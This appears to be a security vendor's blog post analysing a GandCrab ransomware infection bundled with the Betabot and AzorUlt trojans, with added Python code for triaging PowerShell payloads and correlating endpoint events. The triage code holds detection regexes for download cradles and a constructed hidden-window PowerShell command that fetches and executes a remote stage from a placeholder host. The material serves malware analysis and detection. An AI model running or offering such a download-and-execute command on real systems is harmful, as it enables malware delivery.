Check Point Forensic Files: GandCrab Returns with Friends (Trojans)

Following our previous post about GandCrab, this post shows how another variant of this well-known ransomware is observed by Check Point’s SandBlast Agent (SBA) Behavioral Guard and analyzed through the lens of an SBA Forensics report. We also review how this new variant arrives bundled with Trojan malware, and how, even when attacked on multiple fronts, SBA is still able to prevent an infection.


Whereas our last analysis concerned fileless GandCrab, the new variant discussed below does not rely on PowerShell for encryption. Here PowerShell is used mainly to deliver the first stage of the malware combination to end users. In addition, the operation of this malware is distributed across multiple processes, which serves as an evasion technique against traditional malware protections, increases analysis complexity, and reduces compatibility issues for the attacker. It seems the malware authors really do want to infect the victim with at least one of the malware variants and go to great lengths to make sure that happens.


Figure 1: Outline of the attack overview.

As mentioned previously, GandCrab is an advanced operation with its own affiliate program that offers low-skilled threat actors the opportunity to run their own ransomware campaigns.

Figure 2: Bird’s-eye view of the attack by the SandBlast Agent Forensics Report.


PowerShell as an Entry Point  


From the above Forensics Report provided by SandBlast Agent, we can see that the attack begins by launching a hidden PowerShell window with command-line arguments to download a secondary payload from a compromised hosting provider. Our analysts have confirmed that the hosted payload changes frequently in order to evade hash-signature-based anti-virus products.


By viewing the report’s PowerShell process ‘Content Tab’ we can see the entire attack script as it was executed. This is possible because SBA Behavioral Guard has complete oversight of the PowerShell scripts run on the Windows 10 operating system.



Figure 3: The encrypted payload.


As seen in the above screenshot, the payload itself is Base64-encoded bytecode of a portable executable (PE) built with AutoIt, a freeware automation language for Microsoft Windows. The AutoIt-generated PE acts as an unpacker: it downloads further binaries from different servers and creates a multi-layered attack scenario to cover operating systems with different protections. This includes downloading two types of ransomware and trojans, monitoring the ransomware processes, and relaunching them in case of a crash or abrupt termination. Interestingly, the process carries a “Microsoft Windows” signature which is invalid. This signature was most likely taken from another signed process and fails validation because the file’s checksum no longer matches.
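To show what an analyst can pull out of the script content in Figure 3 and the hidden-window command line described above, here is an added Python triage helper, written for this post and not part of Check Point’s tooling or of the SBA report. It flags the PowerShell indicators the text names (hidden window, remote download, Base64-embedded payload) and carves any long Base64 run that decodes to a PE image, reading its Machine field, section count and DLL flag. The indicator names and regexes, the sample command line, the placeholder hosting URL and the synthetic PE bytes are all constructed for the example; the real script and payload are not reproduced.

```python
import base64
import binascii
import re
import struct

# Indicators a triage script can look for in a captured PowerShell command line or script
# body. They cover the behaviours described in the report (hidden window, remote download,
# Base64-embedded payload); the names are our own labels, not SBA's.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "download_cradle": re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer", re.I),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
}

# Long unbroken Base64 runs are candidates for an embedded binary.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")


def parse_pe_header(data: bytes):
    """Return basic header facts if `data` starts with a DOS/PE header, else None."""
    if len(data) < 64 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 60)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    machine, num_sections = struct.unpack_from("<HH", data, e_lfanew + 4)
    characteristics = struct.unpack_from("<H", data, e_lfanew + 22)[0]
    return {
        "machine": hex(machine),
        "sections": num_sections,
        "is_dll": bool(characteristics & 0x2000),   # IMAGE_FILE_DLL
        "size": len(data),
    }


def carve_embedded_pe(script: str):
    """Decode every long Base64 run in the script and keep those that decode to a PE."""
    found = []
    for match in B64_RUN.finditer(script):
        try:
            blob = base64.b64decode(match.group(0), validate=True)
        except (ValueError, binascii.Error):
            continue
        info = parse_pe_header(blob)
        if info:
            found.append(info)
    return found


def triage(script: str) -> dict:
    """Summarise which indicators fire and any embedded PE images found."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(script)]
    return {"indicators": hits, "embedded_pe": carve_embedded_pe(script)}


def build_fake_pe() -> bytes:
    """Constructed test data: a minimal DOS header + PE/COFF header, not a runnable binary."""
    dos = bytearray(64)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 60, 64)            # e_lfanew: PE header immediately follows
    # COFF header: Machine=i386, 3 sections, timestamp/symbols 0, optional header size 0xE0,
    # Characteristics = EXECUTABLE_IMAGE | 32BIT_MACHINE (0x0102)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, 3, 0, 0, 0, 0xE0, 0x0102)
    return bytes(dos) + coff + b"\0" * 128


# Constructed sample command line in the shape described above (the hosting URL is a placeholder).
SAMPLE = (
    "powershell.exe -WindowStyle Hidden -Command \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://hosting.example/stage'); "
    "$pe=[Convert]::FromBase64String('" + base64.b64encode(build_fake_pe()).decode() + "')\""
)
BENIGN = 'powershell.exe -Command "Get-Process | Sort-Object CPU -Descending"'

if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(BENIGN))
```

On the sample, `triage` reports the hidden window, the download cradle, `IEX` and the Base64 decode, and carves one i386 executable (not a DLL) with three sections; the benign administrative command line produces no hits. A real triage would hand the carved bytes to a sandbox or a full PE parser rather than stopping at the header.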


Figure 4: The fake “Microsoft Windows” signature

Once launched, the newly executed process (mwqtep.exe) waits for 200 seconds and then re-launches itself with higher privileges. The malware’s instructions are to:

  1. Pull the C&C URL from memory by offset.
  2. Build a pseudo-random file name.
  3. Access the C&C server and drop the malicious files to %TEMP%.
  4. Run the dropped files.

Figure 5: File operations of mwqtep.exe


In total, four new binaries are downloaded to the infected system as part of the secondary payload: a variant of Betabot (also known as Neurevt), the AzorUlt data stealer, and two variants of the GandCrab ransomware.


Who Runs First?


The Betabot sample is the first to run. Betabot is a “Swiss army knife” kind of malware: it has no single purpose, and its behavior is mostly determined by the C2 server. In order to execute properly and avoid detection it does several things, including injecting itself into explorer.exe. After injection, a series of other binaries is downloaded from the C&C server; in short, these are responsible for the following:


  • Gathering information about the machine
  • Looking for analysis and debugging tools on the machine
  • Detecting virtual machine environments
  • Identifying and disabling certain anti-virus and firewall tools


Betabot is also known to steal the victim’s login credentials and financial data; however, we could not confirm this for the samples analyzed here.

Figure 6: BetaBot process injections to explorer.exe

While Betabot uses several persistence techniques, in the sample above a classic registry Autorun method was used to ensure the trojan survives a reboot.


Figure 7: BetaBot persistence via registry operations


The second malware executed is a variant of the AzorUlt data stealer. The main characteristics of this malware family are:


  • Harvesting Cryptocurrency wallets saved on the machine
  • Extracting credentials saved in FTP/IM/Email clients
  • Staying dormant on the system and listening for instructions from a CnC server


Check Point’s research team has already dissected this malware family, and more details are available in our earlier analysis.


In addition to the above trojans, two variants of the GandCrab ransomware are also downloaded. As can be seen in the reports, one of them actually crashed, which caused the Windows Error Reporting application (werfault.exe) to launch.

Figure 8: The crash and relaunch of the latest variant of GandCrab.


After detecting the crash of the first GandCrab variant, a second variant of GandCrab is launched and successfully escalates privileges. It is then able to continue the attack by encrypting files and writing ransom note files. At the time of the attack this variant had not been seen in the wild.
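The behaviours described from mwqtep.exe onward (files dropped to %TEMP% and then run, Betabot’s remote thread into explorer.exe, the registry Run-key persistence, and the werfault.exe crash followed by the relaunch of another binary from the same directory) are exactly what an endpoint detection engine correlates. The Python correlator below is an added example written for this post, not Check Point’s code or SBA’s detection logic. It walks a constructed, Sysmon-style event timeline and emits one alert per rule; the event field names, the user and file names other than mwqtep.exe, and the five-minute crash-to-relaunch window are assumptions.

```python
from datetime import datetime, timedelta

# Window within which a werfault.exe launch for a %TEMP% binary, followed by a fresh launch of
# a different binary from %TEMP%, is treated as a watchdog relaunch. Assumed value.
RELAUNCH_WINDOW = timedelta(minutes=5)


def in_temp(path: str) -> bool:
    """True if the path lies under the user's %TEMP% directory (case-insensitive)."""
    return "\\appdata\\local\\temp\\" in path.lower()


def correlate(events):
    """Walk Sysmon-style events in time order and return (rule, subject) alerts.

    Assumed event shapes (field names are ours, not Sysmon's exact schema):
      FileCreate:         ts, image, path
      ProcessCreate:      ts, image, parent
      CreateRemoteThread: ts, source, target
      RegistrySet:        ts, image, key, data
    """
    alerts = []
    dropped = {}   # lower-cased path of each file written to %TEMP% -> time written
    crashes = []   # (time, lower-cased parent image) for each werfault.exe launch
    for ev in sorted(events, key=lambda e: e["ts"]):
        ts, kind = ev["ts"], ev["event"]
        if kind == "FileCreate" and in_temp(ev["path"]):
            dropped[ev["path"].lower()] = ts
        elif kind == "ProcessCreate":
            image = ev["image"].lower()
            if image in dropped:                       # dropped to %TEMP%, then executed
                alerts.append(("temp_drop_then_exec", ev["image"]))
            if image.endswith("\\werfault.exe") and in_temp(ev["parent"]):
                crashes.append((ts, ev["parent"].lower()))
            elif in_temp(image):
                for crash_ts, crashed_image in crashes:
                    if crashed_image != image and ts - crash_ts <= RELAUNCH_WINDOW:
                        alerts.append(("crash_then_relaunch", ev["image"]))
                        break
        elif kind == "CreateRemoteThread":
            if ev["target"].lower().endswith("\\explorer.exe") and in_temp(ev["source"]):
                alerts.append(("inject_explorer", ev["source"]))
        elif kind == "RegistrySet":
            if "\\currentversion\\run\\" in ev["key"].lower():
                alerts.append(("run_key_persistence", ev["data"]))
    return alerts


# Constructed sample timeline mirroring the narrative above. Only mwqtep.exe is a name from
# the report; stage_a/b/c and the user name are placeholders.
TEMP = r"C:\Users\victim\AppData\Local\Temp"
T0 = datetime(2018, 9, 1, 10, 0, 0)


def at(seconds: int) -> datetime:
    return T0 + timedelta(seconds=seconds)


EVENTS = [
    {"ts": at(0), "event": "FileCreate", "image": TEMP + r"\mwqtep.exe", "path": TEMP + r"\stage_a.exe"},
    {"ts": at(1), "event": "FileCreate", "image": TEMP + r"\mwqtep.exe", "path": TEMP + r"\stage_b.exe"},
    {"ts": at(2), "event": "FileCreate", "image": TEMP + r"\mwqtep.exe", "path": TEMP + r"\stage_c.exe"},
    {"ts": at(5), "event": "ProcessCreate", "image": TEMP + r"\stage_a.exe", "parent": TEMP + r"\mwqtep.exe"},
    {"ts": at(6), "event": "CreateRemoteThread", "source": TEMP + r"\stage_a.exe", "target": r"C:\Windows\explorer.exe"},
    {"ts": at(7), "event": "RegistrySet", "image": r"C:\Windows\explorer.exe",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\updater", "data": TEMP + r"\stage_a.exe"},
    {"ts": at(10), "event": "ProcessCreate", "image": TEMP + r"\stage_b.exe", "parent": TEMP + r"\mwqtep.exe"},
    {"ts": at(12), "event": "ProcessCreate", "image": r"C:\Windows\System32\WerFault.exe", "parent": TEMP + r"\stage_b.exe"},
    {"ts": at(15), "event": "ProcessCreate", "image": TEMP + r"\stage_c.exe", "parent": TEMP + r"\mwqtep.exe"},
    {"ts": at(20), "event": "ProcessCreate", "image": r"C:\Windows\System32\notepad.exe", "parent": r"C:\Windows\explorer.exe"},
]

if __name__ == "__main__":
    for rule, subject in correlate(EVENTS):
        print(f"{rule:22s} {subject}")
```

Run on the constructed timeline, the correlator raises three drop-then-execute alerts, one explorer.exe injection, one Run-key persistence alert and, once stage_c.exe starts after WerFault.exe was spawned for stage_b.exe, one crash-then-relaunch alert; the notepad.exe launch is silent. In production each rule would be a separate signal with its own severity, and the %TEMP% test would be replaced by the host’s actual user profile paths.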




As seen from the above screenshots, SandBlast Agent’s Behavioral Guard detection engine is capable of adapting to a malware’s evolution over time. It is also robust enough to prevent several malware variants simultaneously, and in this way it can detect and prevent countless types of attacks, including those that abuse legitimate scripting tools. To help IT security professionals monitor and stay on top of these attacks, SandBlast Agent blocks them, remediates them, and automatically creates a forensics report that details how these actions were taken. In this way, even the most sophisticated malware is blocked, keeping organizations secure and protected.